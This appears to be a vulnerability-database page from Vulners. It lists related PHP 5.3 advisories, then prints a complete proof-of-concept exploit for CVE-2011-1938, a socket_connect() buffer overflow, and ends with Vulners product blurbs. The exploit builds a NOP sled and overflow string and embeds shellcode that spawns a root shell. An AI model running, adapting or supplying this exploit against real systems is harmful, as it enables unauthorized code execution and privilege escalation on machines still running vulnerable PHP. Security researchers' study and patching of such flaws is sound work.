| Reporter | Title | Published | Views | Family All 126 |
|---|---|---|---|---|
| php -- multiple vulnerabilities | 18 Aug 201100:00 | – | freebsd | |
| PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability | 25 May 201100:00 | – | zdt | |
| PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938 | 4 Jul 201100:00 | – | zdt | |
| PHP 5.3.x < 5.3.7 Multiple Vulnerabilities | 23 Aug 201100:00 | – | nessus | |
| Mac OS X 10.7 < 10.7.3 Multiple Vulnerabilities | 6 Feb 201200:00 | – | nessus | |
| PHP 5.3 < 5.3.7 Multiple Vulnerabilities | 23 Aug 201100:00 | – | nessus | |
| Amazon Linux AMI : php (ALAS-2011-07) | 4 Sep 201300:00 | – | nessus | |
| Amazon Linux AMI : php (ALAS-2011-7) | 12 Oct 201400:00 | – | nessus | |
| CentOS 5 : php53 (CESA-2011:1423) | 3 Nov 201100:00 | – | nessus | |
| Debian DSA-2399-2 : php5 - several vulnerabilities | 1 Feb 201200:00 | – | nessus |
<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
"\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
"\xcd\x80";
echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);
?>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation